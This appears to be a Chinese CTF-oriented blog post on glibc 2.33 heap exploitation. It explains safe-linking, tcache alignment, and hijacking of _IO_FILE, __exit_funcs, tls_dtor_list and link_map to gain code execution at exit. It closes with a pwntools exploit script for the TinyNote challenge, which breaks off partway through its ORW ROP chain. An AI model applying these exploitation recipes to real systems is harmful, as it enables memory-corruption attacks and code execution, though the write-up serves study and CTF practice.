Glibc 2.33利用技巧

Glibc 2.33怎么玩?

一些新增机制

safe-linking

从Glibc 2.32开始,对tcache单向链表引入safe-linking的保护机制:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
/* Caller must ensure that we know tc_idx is valid and there's room
for more chunks. */
static __always_inline void
tcache_put (mchunkptr chunk, size_t tc_idx)
{
tcache_entry *e = (tcache_entry *) chunk2mem (chunk);

/* Mark this chunk as "in the tcache" so the test in _int_free will
detect a double free. */
e->key = tcache;

e->next = PROTECT_PTR (&e->next, tcache->entries[tc_idx]);
tcache->entries[tc_idx] = e;
++(tcache->counts[tc_idx]);
}

#define PROTECT_PTR(pos, ptr) \
((__typeof (ptr)) ((((size_t) pos) >> 12) ^ ((size_t) ptr)))
#define REVEAL_PTR(ptr) PROTECT_PTR (&ptr, ptr)

需要注意的是,safe-linking自Glibc 2.32起就同时作用于tcache和fastbin这两种单向链表(二者是在同一个补丁中一起加上保护的),Glibc 2.33沿用了这一机制。

这样其实并没有给利用带来很大的影响,甚至更加容易leak heap address(只需要free一个chunk)。

tcache alignment

在Glibc 2.31及以前,tcache poisoning可以完成任意地址分配,但是从Glibc 2.32开始,多了一个check,即tcache chunk也需要0x10对齐:

1
2
3
4
5
6
7
8
9
10
11
12
13
/* Caller must ensure that we know tc_idx is valid and there's
available chunks to remove. */
static __always_inline void *
tcache_get (size_t tc_idx)
{
tcache_entry *e = tcache->entries[tc_idx];
if (__glibc_unlikely (!aligned_OK (e)))
malloc_printerr ("malloc(): unaligned tcache chunk detected");
tcache->entries[tc_idx] = REVEAL_PTR (e->next);
--(tcache->counts[tc_idx]);
e->key = NULL;
return (void *) e;
}

利用技巧

目前总结的利用技巧主要分为四种:

  • _IO_FILE
  • __exit_funcs
  • tls_dtor_list
  • link_map

下文的出发点在于已经获得一些primitive可以通过堆利用,完成对一些内存地址的读写,如利用fastbin reverse into tcache或者large bin attack向某个地址写入堆地址等。

_IO_FILE

house of pig

从源码的角度上深入分析house of pig整个利用链:

首先不论是程序正常从__libc_start_main中返回时,还是从显式提供的exit中返回,抑或是abort(有待考证),其原理都是最终需要调用_IO_flush_all_lockp

以exit举例:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
/* Call all functions registered with `atexit' and `on_exit',
in the reverse of the order in which they were registered
perform stdio cleanup, and terminate program execution with STATUS. */
void
attribute_hidden
__run_exit_handlers (int status, struct exit_function_list **listp,
bool run_list_atexit, bool run_dtors)
{
/* First, call the TLS destructors. */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

/* We do it this way to handle recursive calls to exit () made by
the functions registered with `atexit' and `on_exit'. We call
everyone on the list and use the status value in the last
exit (). */
while (true)
{
struct exit_function_list *cur;

__libc_lock_lock (__exit_funcs_lock);

restart:
cur = *listp;

if (cur == NULL)
{
/* Exit processing complete. We will not allow any more
atexit/on_exit registrations. */
__exit_funcs_done = true;
__libc_lock_unlock (__exit_funcs_lock);
break;
}

while (cur->idx > 0)
{
struct exit_function *const f = &cur->fns[--cur->idx];
const uint64_t new_exitfn_called = __new_exitfn_called;

/* Unlock the list while we call a foreign function. */
__libc_lock_unlock (__exit_funcs_lock);
switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);

case ef_free:
case ef_us:
break;
case ef_on:
onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
onfct (status, f->func.on.arg);
break;
case ef_at:
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
atfct ();
break;
case ef_cxa:
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
cxafct (f->func.cxa.arg, status);
break;
}
/* Re-lock again before looking at global state. */
__libc_lock_lock (__exit_funcs_lock);

if (__glibc_unlikely (new_exitfn_called != __new_exitfn_called))
/* The last exit function, or another thread, has registered
more exit functions. Start the loop over. */
goto restart;
}

*listp = cur->next;
if (*listp != NULL)
/* Don't free the last element in the chain, this is the statically
allocate element. */
free (cur);

__libc_lock_unlock (__exit_funcs_lock);
}

if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

_exit (status);
}


void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

不论__run_exit_handlers中间通过__exit_funcs结构做了多少相关操作,exit最终都会进入下面这段逻辑:

1
2
if (run_list_atexit)
RUN_HOOK (__libc_atexit, ());

由于run_list_atexit是__run_exit_handlers的第三个参数,而exit传入的值为true,那么一定会调用这个HOOK函数。

那么这个HOOK函数是什么,结合IDA以及GDB,可以发现它其实是_IO_cleanup

1
2
3
4
5
6
7
8
9
10
__libc_atexit:00000000001E2608
__libc_atexit:00000000001E2608 ; Segment type: Pure data
__libc_atexit:00000000001E2608 ; Segment permissions: Read/Write
__libc_atexit:00000000001E2608 __libc_atexit segment qword public 'DATA' use64
__libc_atexit:00000000001E2608 assume cs:__libc_atexit
__libc_atexit:00000000001E2608 ;org 1E2608h
__libc_atexit:00000000001E2608 off_1E2608 dq offset _IO_cleanup ; DATA XREF: __run_exit_handlers+1DA↑o
__libc_atexit:00000000001E2608 ; sub_59840+1642↑o ...
__libc_atexit:00000000001E2608 __libc_atexit ends
__libc_atexit:00000000001E2608

这个_IO_cleanup就会执行我们所需要的_IO_flush_all_lockp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
int
_IO_cleanup (void)
{
/* We do *not* want locking. Some threads might use streams but
that is their problem, we flush them underneath them. */
int result = _IO_flush_all_lockp (0);

/* We currently don't have a reliable mechanism for making sure that
C++ static destructors are executed in the correct order.
So it is possible that other static destructors might want to
write to cout - and they're supposed to be able to do so.

The following will make the standard streambufs be unbuffered,
which forces any output from late destructors to be written out. */
_IO_unbuffer_all ();

return result;
}

那么,_IO_flush_all_lockp又干了什么,通过这个调用我们能怎样完成利用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
int
_IO_flush_all_lockp (int do_lock)
{
int result = 0;
FILE *fp;

#ifdef _IO_MTSAFE_IO
_IO_cleanup_region_start_noarg (flush_cleanup);
_IO_lock_lock (list_all_lock);
#endif

for (fp = (FILE *) _IO_list_all; fp != NULL; fp = fp->_chain)
{
run_fp = fp;
if (do_lock)
_IO_flockfile (fp);

if (((fp->_mode <= 0 && fp->_IO_write_ptr > fp->_IO_write_base)
|| (_IO_vtable_offset (fp) == 0
&& fp->_mode > 0 && (fp->_wide_data->_IO_write_ptr
> fp->_wide_data->_IO_write_base))
)
&& _IO_OVERFLOW (fp, EOF) == EOF)
result = EOF;

if (do_lock)
_IO_funlockfile (fp);
run_fp = NULL;
}

#ifdef _IO_MTSAFE_IO
_IO_lock_unlock (list_all_lock);
_IO_cleanup_region_end (0);
#endif

return result;
}

可以很清楚地看到,该函数的逻辑可以简单地理解为通过_IO_list_all(实际上指向_IO_2_1_stderr_),遍历标准错误、输出、输入流,根据情况调用_IO_OVERFLOW(fp, EOF)刷新相应流缓冲区。

考虑到利用场景下,我们可以劫持_IO_list_all,或者stderr、stdout、stdin的_chain成员,从而引入一个fake _IO_FILE结构体(记为fake_fp)。

在满足如下两种条件之一的情况下:(显然第一个条件更为简单)

  • fake_fp->_mode <= 0

    • fake_fp->_IO_write_ptr > fake_fp->_IO_write_base
  • fake_fp->_mode > 0

    • fake_fp->_vtable_offset = 0 && fake_fp->_wide_data->_IO_write_ptr > fake_fp->_wide_data->_IO_write_base

会调用fake_fp->_vtable->_IO_overflow_t,即vtable + 0x18处的指针指向的函数,且第一个参数为fake_fp自身。

再考虑从Glibc 2.24开始引入的vtable check(vtable指针必须落在libc自身的vtable段内),我们无法再伪造任意的vtable,但仍然可以调用libc中任意合法vtable里的任意函数指针。

而house of pig即是在这个基础上,使得fake_fp->vtable = _IO_str_jumps,那么实际调用的_IO_overflow_t就是_IO_str_overflow:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
int
_IO_str_overflow (FILE *fp, int c)
{
int flush_only = c == EOF;
size_t pos;
if (fp->_flags & _IO_NO_WRITES)
return flush_only ? 0 : EOF;
if ((fp->_flags & _IO_TIED_PUT_GET) && !(fp->_flags & _IO_CURRENTLY_PUTTING))
{
fp->_flags |= _IO_CURRENTLY_PUTTING;
fp->_IO_write_ptr = fp->_IO_read_ptr;
fp->_IO_read_ptr = fp->_IO_read_end;
}
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
char *new_buf;
char *old_buf = fp->_IO_buf_base;
size_t old_blen = _IO_blen (fp);
size_t new_size = 2 * old_blen + 100;
if (new_size < old_blen)
return EOF;
new_buf = malloc (new_size);
if (new_buf == NULL)
{
/* __ferror(fp) = 1; */
return EOF;
}
if (old_buf)
{
memcpy (new_buf, old_buf, old_blen);
free (old_buf);
/* Make sure _IO_setb won't try to delete _IO_buf_base. */
fp->_IO_buf_base = NULL;
}
memset (new_buf + old_blen, '\0', new_size - old_blen);

_IO_setb (fp, new_buf, new_buf + new_size, 1);
fp->_IO_read_base = new_buf + (fp->_IO_read_base - old_buf);
fp->_IO_read_ptr = new_buf + (fp->_IO_read_ptr - old_buf);
fp->_IO_read_end = new_buf + (fp->_IO_read_end - old_buf);
fp->_IO_write_ptr = new_buf + (fp->_IO_write_ptr - old_buf);

fp->_IO_write_base = new_buf;
fp->_IO_write_end = fp->_IO_buf_end;
}
}

if (!flush_only)
*fp->_IO_write_ptr++ = (unsigned char) c;
if (fp->_IO_write_ptr > fp->_IO_read_end)
fp->_IO_read_end = fp->_IO_write_ptr;
return c;
}
libc_hidden_def (_IO_str_overflow)

这里的malloc、memcpy、free就是关键所在,即等价于执行了:

  • ptr = malloc((fake_fp->_IO_buf_end - fake_fp->_IO_buf_base) * 2 + 100)
  • memcpy(ptr, fake_fp->_IO_buf_base, fake_fp->_IO_buf_end - fake_fp->_IO_buf_base)
  • free(fake_fp->_IO_buf_base)(注意被释放的是旧缓冲区old_buf,而不是新分配的ptr)

同时注意到,这里存在一个限制:

1
2
3
4
5
6
7
8
9
10
11
12
int flush_only = c == EOF;
...
pos = fp->_IO_write_ptr - fp->_IO_write_base;
if (pos >= (size_t) (_IO_blen (fp) + flush_only))
{
if (fp->_flags & _IO_USER_BUF) /* not allowed to enlarge */
return EOF;
else
{
... // need to be here
}
}

即需要满足fake_fp->_IO_write_ptr - fake_fp->_IO_write_base > fake_fp->_IO_buf_end - fake_fp->_IO_buf_base(flush_only为1,所以pos >= blen + 1等价于pos > blen),以及(fake_fp->_flags & _IO_USER_BUF) == 0

做个小小的总结,伪造的_IO_FILE只要满足:

  • (_flags & _IO_USER_BUF) == 0,且(_flags & _IO_NO_WRITES) == 0(否则_IO_str_overflow会在入口处直接返回)
  • _mode <= 0
  • _IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base
  • vtable = _IO_str_jumps (或者其他含有_IO_str_overflow指针的vtable)

就可以愉快地调用malloc、memcpy、free了。

__exit_funcs

上面在分析exit的时候,跳过了__exit_funcs的逻辑,实际上,__exit_funcs作为libc中的全局变量,是可以被修改的:

1
2
3
4
5
6
void
exit (int status)
{
__run_exit_handlers (status, &__exit_funcs, true, true);
}
libc_hidden_def (exit)

首先,关注一下__exit_funcs里,存的到底是个什么东西,实际上,它存放了一个exit_function_list结构体指针:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
struct exit_function_list
{
struct exit_function_list *next;
size_t idx;
struct exit_function fns[32];
};

struct exit_function
{
/* `flavour' should be of type of the `enum' above but since we need
this element in an atomic operation we have to use `long int'. */
long int flavor;
union
{
void (*at) (void);
struct
{
void (*fn) (int status, void *arg);
void *arg;
} on;
struct
{
void (*fn) (void *arg, int status);
void *arg;
void *dso_handle;
} cxa;
} func;
};

其中,毋庸置疑,next成员组织了一条单向链表,它遍历的行为,就是在每轮循环后,用next覆盖__exit_funcs:(不过不是很重要)

1
*listp = cur->next;     // listp = &__exit_funcs

关键在于,idx指明了exit_function的数量,且会从后往前遍历exit_functions数组,并根据其中的flavor成员进行相应的函数调用:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
switch (f->flavor)
{
void (*atfct) (void);
void (*onfct) (int status, void *arg);
void (*cxafct) (void *arg, int status);

case ef_free: // 0
case ef_us: // 1
break;
case ef_on: // 2
onfct = f->func.on.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (onfct);
#endif
onfct (status, f->func.on.arg);
break;
case ef_at: // 3
atfct = f->func.at;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (atfct);
#endif
atfct ();
break;
case ef_cxa: // 4
/* To avoid dlclose/exit race calling cxafct twice (BZ 22180),
we must mark this function as ef_free. */
f->flavor = ef_free;
cxafct = f->func.cxa.fn;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif
cxafct (f->func.cxa.arg, status);
break;
}

不难想到,如果我们劫持__exit_funcs,设置其idx = 1,然后相应地设置fns[0],就可以完成任意函数调用了,如果关注一下case ef_cxa的情况,甚至函数的第一个参数都是可控的。

然而事实却并非那么简单,注意到:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (cxafct);
#endif

/* Pointer mangling support. */
#if IS_IN (rtld)
/* We cannot use the thread descriptor because in ld.so we use setjmp
earlier than the descriptor is initialized. */
# ifdef __ASSEMBLER__
# define PTR_MANGLE(reg) xor __pointer_chk_guard_local(%rip), reg; \
rol $2*LP_SIZE+1, reg
# define PTR_DEMANGLE(reg) ror $2*LP_SIZE+1, reg; \
xor __pointer_chk_guard_local(%rip), reg
# else
# define PTR_MANGLE(reg) asm ("xor __pointer_chk_guard_local(%%rip), %0\n" \
"rol $2*" LP_SIZE "+1, %0" \
: "=r" (reg) : "0" (reg))
# define PTR_DEMANGLE(reg) asm ("ror $2*" LP_SIZE "+1, %0\n" \
"xor __pointer_chk_guard_local(%%rip), %0" \
: "=r" (reg) : "0" (reg))
# endif
#else
# ifdef __ASSEMBLER__
# define PTR_MANGLE(reg) xor %fs:POINTER_GUARD, reg; \
rol $2*LP_SIZE+1, reg
# define PTR_DEMANGLE(reg) ror $2*LP_SIZE+1, reg; \
xor %fs:POINTER_GUARD, reg
# else
# define PTR_MANGLE(var) asm ("xor %%fs:%c2, %0\n" \
"rol $2*" LP_SIZE "+1, %0" \
: "=r" (var) \
: "0" (var), \
"i" (offsetof (tcbhead_t, \
pointer_guard)))
# define PTR_DEMANGLE(var) asm ("ror $2*" LP_SIZE "+1, %0\n" \
"xor %%fs:%c2, %0" \
: "=r" (var) \
: "0" (var), \
"i" (offsetof (tcbhead_t, \
pointer_guard)))
# endif
#endif

简单来说,这里存在一个指针加解密的操作,即f->func.cxa.fn是被加密过的,如果直接写入目标地址,那么解密后得到的是非法地址,显然会SIGSEGV。

但是考虑得更深一步的话,会发现,这个解密操作ror(ptr, 17) ^ fs:[0x30](对应的加密操作为rol(ptr ^ fs:[0x30], 17))中,fs:[0x30]位于TLS处,是完全可写的位置,如果将其修改为一个已知值,那么指针加密的问题就迎刃而解了。

如何定位到TLS的位置,实际上本地环境和远程环境往往存在差异,但是空间并不大,爆破是完全可取的

至于如何在本地定位到这个fs:[0x30],目前我的做法是:

  • 注意到在ld中执行相应逻辑时,PTR_DEMANGLE的宏定义中,取的不是fs:[0x30],而是__pointer_chk_guard_local
  • 因此,完全可以先读到__pointer_chk_guard_local,然后在内存中搜索即可,因为两者值是完全一致的

解决这个问题之后,那么只要设置好加密指针和函数,目的就已经达到了。

同样做个小小的总结,伪造的__exit_funcs只要满足:

  • idx = 1
  • fns[0].flavor = ef_cxa
  • fns[0].func.cxa.fn = rol(fs:[0x30] ^ system, 17)
  • fns[0].func.cxa.arg = &str_bin_sh

就可以在exit的时候,调用system("/bin/sh")了;当然,如果要orw的话,做相应的修改即可,这点与打__free_hook应该没什么区别。

tls_dtor_list

不小心忽略了__run_exit_handlers中,最开始的一部分代码了:

1
2
3
4
5
6
  /* First, call the TLS destructors.  */
#ifndef SHARED
if (&__call_tls_dtors != NULL)
#endif
if (run_dtors)
__call_tls_dtors ();

首先从传参的角度,run_dtors = true,必然进入到__call_tls_dtors中;且从注释里面可以看到,这其实是要对TLS进行析构。

深入分析__call_tls_dtors

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
static __thread struct dtor_list *tls_dtor_list;

/* Call the destructors. This is called either when a thread returns from the
initial function or when the process exits via the exit function. */
void
__call_tls_dtors (void)
{
while (tls_dtor_list)
{
struct dtor_list *cur = tls_dtor_list;
dtor_func func = cur->func;
#ifdef PTR_DEMANGLE
PTR_DEMANGLE (func);
#endif

tls_dtor_list = tls_dtor_list->next;
func (cur->obj);

/* Ensure that the MAP dereference happens before
l_tls_dtor_count decrement. That way, we protect this access from a
potential DSO unload in _dl_close_worker, which happens when
l_tls_dtor_count is 0. See CONCURRENCY NOTES for more detail. */
atomic_fetch_add_release (&cur->map->l_tls_dtor_count, -1);
free (cur);
}
}
libc_hidden_def (__call_tls_dtors)

简单明了,tls_dtor_list存放在TLS上,且处于可写的地址处,如果能够劫持tls_dtor_list,就可以任意函数调用了,且第一个参数同样可控:

1
2
3
4
5
6
7
8
9
typedef void (*dtor_func) (void *);

struct dtor_list
{
dtor_func func;
void *obj;
struct link_map *map;
struct dtor_list *next;
};

同样的问题是,该指针仍然是被加密的,如果能够修改fs:[0x30]的值,同样可以完成bypass。

link_map

来自安全客的一篇house of banana,利用核心在于劫持_rtld_global中的link_map结构。之所以要分析它,是因为这篇house of banana虽然给了poc,但是原理还是得弄清楚,虽然可能不常用,但是说不定什么时候就派上用场了。

_rtld_global作为一个ld中的全局变量,它是一个rtld_global结构体,但如果要从结构体入手分析,则过于复杂,因此选择从被引函数分析入手。

那么问题在于,_rtld_global在哪里被用到了,实际上,它是在exit解析__exit_funcs后调用的_dl_fini中被引用的,如果直接在_dl_fini中下断点,不难根据调用栈定位到。

那么,分析一下_dl_fini:(因为过长,所以选择关键部分)

  • 首先第一部分:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    38
     for (Lmid_t ns = GL(dl_nns) - 1; ns >= 0; --ns)
    {
    /* Protect against concurrent loads and unloads. */
    __rtld_lock_lock_recursive (GL(dl_load_lock));

    unsigned int nloaded = GL(dl_ns)[ns]._ns_nloaded;
    /* No need to do anything for empty namespaces or those used for
    auditing DSOs. */
    if (nloaded == 0
    #ifdef SHARED
    || GL(dl_ns)[ns]._ns_loaded->l_auditing != do_audit
    #endif
    )
    __rtld_lock_unlock_recursive (GL(dl_load_lock));
    else
    {
    /* Now we can allocate an array to hold all the pointers and
    copy the pointers in. */
    struct link_map *maps[nloaded];

    unsigned int i;
    struct link_map *l;
    assert (nloaded != 0 || GL(dl_ns)[ns]._ns_loaded == NULL);
    for (l = GL(dl_ns)[ns]._ns_loaded, i = 0; l != NULL; l = l->l_next)
    /* Do not handle ld.so in secondary namespaces. */
    if (l == l->l_real)
    {
    assert (i < nloaded);

    maps[i] = l;
    l->l_idx = i;
    ++i;

    /* Bump l_direct_opencount of all objects so that they
    are not dlclose()ed from underneath us. */
    ++l->l_direct_opencount;
    }
    ...

    通常情况下,这里GL(dl_nns)即_rtld_global._dl_nns = 1,从而引出了我们的目标GL(dl_ns)[ns]._ns_loaded,即_rtld_global._dl_ns[0]._ns_loaded这个link_map结构体指针;而这里的逻辑,其实就是通过link_map->l_next遍历单向链表,然后依次放入到maps中。

  • 关键在于第二部分:

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    #define	DT_FINI_ARRAY	26		/* Array with addresses of fini fct */
    #define DT_INIT_ARRAYSZ 27 /* Size in bytes of DT_INIT_ARRAY */
    #define DT_FINI_ARRAYSZ 28 /* Size in bytes of DT_FINI_ARRAY */

    for (i = 0; i < nmaps; ++i)
    {
    struct link_map *l = maps[i];

    if (l->l_init_called)
    {
    /* Make sure nothing happens if we are called twice. */
    l->l_init_called = 0;

    /* Is there a destructor function? */
    if (l->l_info[DT_FINI_ARRAY] != NULL
    || (ELF_INITFINI && l->l_info[DT_FINI] != NULL))
    {
    /* When debugging print a message first. */
    if (__builtin_expect (GLRO(dl_debug_mask)
    & DL_DEBUG_IMPCALLS, 0))
    _dl_debug_printf ("\ncalling fini: %s [%lu]\n\n",
    DSO_FILENAME (l->l_name),
    ns);

    /* First see whether an array is given. */
    if (l->l_info[DT_FINI_ARRAY] != NULL)
    {
    ElfW(Addr) *array =
    (ElfW(Addr) *) (l->l_addr
    + l->l_info[DT_FINI_ARRAY]->d_un.d_ptr);
    unsigned int i = (l->l_info[DT_FINI_ARRAYSZ]->d_un.d_val
    / sizeof (ElfW(Addr)));
    while (i-- > 0)
    ((fini_t) array[i]) ();
    }
    ...

    简而言之,这段逻辑通过l->l_info数组中存放的各个动态段条目(Elf64_Dyn)指针,定位fini_array数组的位置和大小,并且从后往前依次调用其中的函数。

结合struct link_map结构体数据结构,需要伪造以下结构体成员:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
_rtld_global->_dl_ns[0]->_ns_loaded: (link map) 
offset member
0x0 l_addr (point to program base by default)
0x18 l_next (point to next link map, the length of the linked list should be 4)
0x28 l_real (point to itself)
0x110 l_info[0x1A] (
point to fini_array Elf64_Dyn structure:
typedef struct
{
Elf64_Sxword d_tag; /* Dynamic entry type */
union
{
Elf64_Xword d_val; /* Integer value */
Elf64_Addr d_ptr; /* Address value */
// l_info[0x1A]->d_un.d_ptr + l_addr = &fini_array
} d_un;
} Elf64_Dyn;)
)
0x120 l_info[0x1C] (point to fini_array_size Elf64_Dyn structure) // l_info[0x1C]->d_un.d_val = sizeof(fini_array)
0x31C l_init_called (should be non-zero)

关于为什么linked list的长度要是4,其实原文章中提到的是需要>=4,但是在调试所给的PoC时,同时结合源码分析,发现只能=4

这应该是和初始化_rtld_global->_dl_ns->_ns_nloaded的值有关(这里是4),同时满足3个assert:

1
2
3
4
assert (i < nloaded);
...
assert (ns != LM_ID_BASE || i == nloaded);
assert (ns == LM_ID_BASE || i == nloaded || i == nloaded - 1);

故在ns = LM_ID_BASE的情况下(默认如此),满足的约束为i == nloaded

不过还需具体情况下,进行调试分析得出。

同样小小总结一下,我们主要需要伪造一个link_map结构体,即_rtld_global->_dl_ns[0]->_ns_loaded指向的结构体:

  • l_addr为基址
  • l_next维护的单向链表长度为4
  • l_real为结构体本身,即对于链表中每个link_map节点,其值必须等于本身
  • l_info[0x1A]struct Elf64_Dyn *,其指向的结构体需要满足l_info[0x1A]->d_un.d_ptr + l_addr = fake_fini_array
  • l_info[0x1C]同为struct Elf64_Dyn *,其指向的结构体需要满足l_info[0x1C]->d_un.d_val = sizeof(fake_fini_array)
  • l_init_called需不为0
  • fake_fini_array中布置好需要调用的函数指针

那么在程序exit进入_dl_fini后,就能调用目标函数。

示例

西湖论剑2021的TinyNote,这题需要通过fastbin_reverse_into_tcache,来实现“任意”地址写tcache_pthread_struct的地址。
但是,像上面提到的,由于tcache chunk现在需要对齐到0x10,且fd指针是受safe-linking机制保护的指针(值本身是非法地址),所以只能够实现向0x???????????8的位置,写入tcache_pthread_struct的地址。
那么综合考虑以上的利用方案,我们可以修改stderr->_chain,也可以修改__exit_funcs;至于_rtld_global->_dl_ns[0]->_ns_loaded和__call_tls_dtors所使用的tls_dtor_list,都无法修改成合法的地址(因为它们地址都是0x??????????10)。
所以下面的exp主要通过两种方案来实现orw,一种是改stderr->_chain,通过exit触发_IO_flush_all_lockp完成利用;一种是伪造__exit_funcs,不过同样是在exit的时候完成利用。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
#!/usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import sys, os, re

context(arch='amd64', os='linux', log_level='debug')

_proc = os.path.abspath('./TinyNote')
_libc = os.path.abspath('./libc-2.33.so')

libc = ELF(_libc)
elf = ELF(_proc)

_debug = int(sys.argv[1]) if len(sys.argv) > 1 else 0

p = process(argv=[_proc])
if _debug != 0:
gdb.attach(p)

# menu
choose_items = {
"add": 1,
"edit": 2,
"show": 3,
"delete": 4,
"bonus": 5
}

def choose(idx):
p.sendlineafter("Choice:", str(idx))

def add(idx):
choose(choose_items['add'])
p.sendlineafter("Index:", str(idx))

def edit(idx, content):
choose(choose_items['edit'])
p.sendlineafter("Index:", str(idx))
p.sendafter("Content:", content)

def show(idx):
choose(choose_items['show'])
p.sendlineafter("Index:", str(idx))

def delete(idx):
choose(choose_items['delete'])
p.sendlineafter("Index:", str(idx))

def arbitrary_write(addr, content):
delete(1)
edit(0, "\x02")
edit(1, p64(addr ^ (heap_base >> 12)))
add(1)
add(2)
edit(2, content)

#################################### Method 1: hijack stderr
# leak heap base
add(0)
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
heap_base = u64(p.recv(8)) << 12

# leak libc base
for i in range(0x23):
add(1)
add(2)
delete(1)
delete(2)
edit(2, p64((heap_base + 0x290) ^ (heap_base >> 12)))
add(1)
add(1)
edit(1, p64(0) + p64(0x421))
delete(0)
add(0)
show(0)
p.recvuntil("Content:")
libc_base = u64(p.recv(8)) - 0x1e0ba0 - 0x450

# malloc tcache_struct
add(1)
delete(0)
delete(1)
edit(1, p64((heap_base + 0x10) ^ (heap_base >> 12)))
add(0)
add(0) # chunk 0 points to tcache_struct

# prepare fastbin
add(1)
for i in range(5):
add(2)
edit(2, p64((heap_base + 0x310 + 0x20 * i) ^ (heap_base >> 12)))
add(2)
edit(2, p64((libc_base + libc.sym['_IO_2_1_stderr_'] + 0x68 - 0x18) ^ (heap_base >> 12)))
edit(0, "\x07") # "fill" the tcache bin
delete(1) # put into fastbin
edit(1, p64((heap_base + 0x2F0) ^ (heap_base >> 12))) # prepare for fastbin reverse into tcache attack

# fastbin reverse into tcache attack, this will change stderr->_chain
edit(0, "\x00") # "clear" the tcache bin
add(1)

# forge stdout
edit(0, "\x00") # "clear" the tcache bin
arbitrary_write(heap_base + 0x30, p64(0) + p64(0xFFFFFFFFFFFF)) # _IO_write_base = 0, _IO_write_ptr = 0xFFFF (make sure _IO_write_ptr - _IO_write_base > _IO_buf_end - _IO_buf_base)
arbitrary_write(heap_base + 0x40, p64(0) + p64(heap_base + 0xE00)) # _IO_buf_base = src buffer start
arbitrary_write(heap_base + 0x50, p64(heap_base + 0xE00 + 0xB0)) # _IO_buf_end = source buffer end
arbitrary_write(heap_base + 0xe0, p64(0) + p64(libc_base + 0x1e2560)) # vtable = _IO_str_jumps

# ORW
def orw_payload(libc_base, orwchain_base):
pop_rdi = libc_base + 0x0000000000028a55 # pop rdi ; ret
pop_rsi = libc_base + 0x000000000002a4cf # pop rsi ; ret
pop_rdx = libc_base + 0x00000000000c7f32 # pop rdx ; ret
func_cnt = 3
args_cnt = 2 + 3 + 1
